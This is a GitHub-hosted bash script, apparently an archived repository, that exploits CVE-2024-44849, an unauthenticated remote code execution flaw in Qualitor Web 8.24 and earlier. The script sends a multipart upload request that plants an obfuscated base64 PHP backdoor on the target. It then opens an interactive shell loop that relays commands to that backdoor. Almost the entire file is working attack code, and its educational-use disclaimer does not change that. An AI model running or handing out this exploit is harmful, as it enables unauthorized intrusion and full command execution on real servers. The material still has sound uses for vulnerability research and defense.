This repository has been archived by the owner on Oct 11, 2024. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 0
/
cve-2024-44849.bash
90 lines (63 loc) · 2.6 KB
/
cve-2024-44849.bash
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
#!/bin/bash
# Author: Extencil <extencil@extencil.me>
# Date: September, 2024.
#
# CVE-2024-44849 Unauthenticated Remote Code Execution Exploit (CRITICAL)
echo "
Qualitor Web <= 8.24 RCE Exploit v1.0 (CVE-2024-44849)
By Extencil <extencil@extencil.me>, September 2024.
Using this program to attack or compromise any company or system without mutual consent is illegal. The author of this code does not take any responsibility for any misuse or illegal activities conducted using this software. It is intended for educational purposes and authorized testing only. Always ensure you have proper authorization before conducting any security assessments.
"
URL=$1
if [ $# -lt 1 ]; then
echo "
Usage:
$0 <url>
$0 https://csc.extencil.me/html/ad/adfilestorage/request/checkAcesso.php
"
else
echo "[*] Exploiting the target.."
# Define the file name and malicious content
FILENAME=$(< /dev/urandom tr -dc 'a-z0-9' | head -c 16)".php"
MALICIOUS_CODE='<?php $i=base64_decode("aWYoaXNzZXQoJF9QT1NUWzBdKSl7c3lzdGVtKCRfUE9TVFswXSk7ZGllO30K");eval($i);?>' # The Hackers Choice <thc.org> Smallest PHP Backdoor
BACKDOOR_URL=$(echo $URL | sed 's/checkAcesso.php$//')"$FILENAME"
# Boundary for multipart/form-data
BOUNDARY="---------------------------QUALITORspaceCVEspace2024space44849"
# Create the POST request with curl using inline file content
echo "[*] Sending the backdoor.."
curl -X POST $URL -s --insecure \
-H "Cookie: XDEBUG_SESSION=ECLIPSE_DBGP; XDEBUG_SESSION=ECLIPSE_DBGP; B_protocol=https%3A; XDEBUG_SESSION=ECLIPSE_DBGP; SOLICITANTE=false; _LOGIN_SOLICITANTE_=padrao; ATENDENTE=false; session820=" \
-H "Content-Type: multipart/form-data; boundary=$BOUNDARY" \
--data-binary "--$BOUNDARY
Content-Disposition: form-data; name=\"idtipo\"
2
--$BOUNDARY
Content-Disposition: form-data; name=\"nmfilestorage\"
--$BOUNDARY
Content-Disposition: form-data; name=\"nmdiretoriorede\"
.
--$BOUNDARY
Content-Disposition: form-data; name=\"nmbucket\"
--$BOUNDARY
Content-Disposition: form-data; name=\"nmaccesskey\"
--$BOUNDARY
Content-Disposition: form-data; name=\"nmkeyid\"
--$BOUNDARY
Content-Disposition: form-data; name=\"fleArquivo\"; filename=\"$FILENAME\"
$MALICIOUS_CODE
--$BOUNDARY
Content-Disposition: form-data; name=\"cdfilestorage\"
--$BOUNDARY--"
echo
echo
echo "[*] Target is vulnerable if 'Upload realizado com sucesso'."
echo
while true; do
read -p "(backdoor@qualitor): $ " BackdoorCommand
if [[ "$BackdoorCommand" == "exit" ]]; then
echo "Exiting..."
break
fi
curl $BACKDOOR_URL -d 0="$BackdoorCommand"
done
fi